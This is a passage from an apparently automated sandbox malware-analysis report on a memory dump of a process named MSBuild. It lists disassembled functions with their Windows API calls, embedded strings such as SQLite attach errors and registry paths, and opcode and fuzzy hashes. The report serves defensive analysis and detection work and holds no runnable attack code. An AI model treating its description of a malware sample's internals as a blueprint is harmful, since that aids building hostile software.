                                                                                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                            Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$_snwprintf
                                                                                                                                            • String ID: %%0.%df
                                                                                                                                            • API String ID: 3473751417-763548558
                                                                                                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                            Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                            • GetParent.USER32(?), ref: 00406136
                                                                                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                            • String ID: A
                                                                                                                                            • API String ID: 2892645895-3554254475
                                                                                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                            Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                            • String ID: 0$6
                                                                                                                                            • API String ID: 4066108131-3849865405
                                                                                                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                            Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004082EF
                                                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                            • memset.MSVCRT ref: 00408362
                                                                                                                                            • memset.MSVCRT ref: 00408377
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$ByteCharMultiWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 290601579-0
                                                                                                                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                            Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040A47B
                                                                                                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                            • String ID: %s (%s)$YV@
                                                                                                                                            • API String ID: 3979103747-598926743
                                                                                                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                            Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                            • API String ID: 2780580303-317687271
                                                                                                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                            Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                            • String ID: Unknown Error$netmsg.dll
                                                                                                                                            • API String ID: 2767993716-572158859
                                                                                                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                            Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                            • database is already attached, xrefs: 0042F721
                                                                                                                                            • out of memory, xrefs: 0042F865
                                                                                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpymemset
                                                                                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                            • API String ID: 1297977491-2001300268
                                                                                                                                            • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                            • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                            Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                            • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                            • free.MSVCRT ref: 004185AC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2802642348-0
                                                                                                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                            Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                            • String ID: strings
                                                                                                                                            • API String ID: 3166385802-3030018805
                                                                                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                            Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                            • memset.MSVCRT ref: 00405455
                                                                                                                                            • memset.MSVCRT ref: 0040546C
                                                                                                                                            • memset.MSVCRT ref: 00405483
                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$memcpy$ErrorLast
                                                                                                                                            • String ID: 6$\
                                                                                                                                            • API String ID: 404372293-1284684873
                                                                                                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                            Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1331804452-0
                                                                                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                            Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                            • String ID: advapi32.dll
                                                                                                                                            • API String ID: 2012295524-4050573280
                                                                                                                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                            Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                            • <%s>, xrefs: 004100A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$_snwprintf
                                                                                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                            • API String ID: 3473751417-2880344631
                                                                                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                            Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcscat$_snwprintfmemset
                                                                                                                                            • String ID: %2.2X
                                                                                                                                            • API String ID: 2521778956-791839006
                                                                                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                            Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _snwprintfwcscpy
                                                                                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                            • API String ID: 999028693-502967061
                                                                                                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                            Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                            • memset.MSVCRT ref: 0040C439
                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4131475296-0
                                                                                                                                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
